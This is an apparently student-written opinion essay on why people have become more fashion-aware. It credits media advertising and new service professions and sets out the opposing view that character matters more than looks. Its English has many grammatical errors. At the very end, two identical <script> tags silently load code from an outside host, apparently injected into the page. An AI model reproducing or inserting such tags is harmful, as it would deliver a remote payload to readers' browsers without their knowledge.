Gone are the days,people were no appearance curious but now a days,a major section of society more fashion aware due to several reasons.the ever large number of beauty saloons tastifies this statement. i also agree with this view.

To commence with, there are large innumerable reasons behind this attitude.Firstly,media is first culprit.Media is flooded with various advertisements such as clothes,footwears,cosmetics,ornaments and so on,which mesmerize people to buy all these products to glorify their appearance.A recent survey conducted by a cosmopolitan magazine has revealed that media make its target to females and child because they are considered to be most vulnerable section of society.Moreover,media gave birth to this axiom,"better be out of the world than out of fashion".

Furthermore,there was a time when people gave no or less importance to their appearance due to their physical appearance as their life style was labour - intensive.However,now a days,many new professions has been emerged in our society such as hospitality and management.It is a part of these professions to be good looking and charming to attract people.Thus,people are giving more weightage to fashion.

on the other hand,a major section of society disagree with this view.They accord that spending time and money on appearance is an exorbitant expenditure nothing more than that.According to them,character is far more important than physical appearance because they believe in this saying,"beauty is only skin deep and clothes do not make a man".In addition to it,majority of people have other priorities of life besides fashion like education,career,family and many more.

To encapsulate, as per my point of view,it is evident that being fashionable is an enscapable in these modern days to survive in modern society because it is said that while in Rome,do as Romans to.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>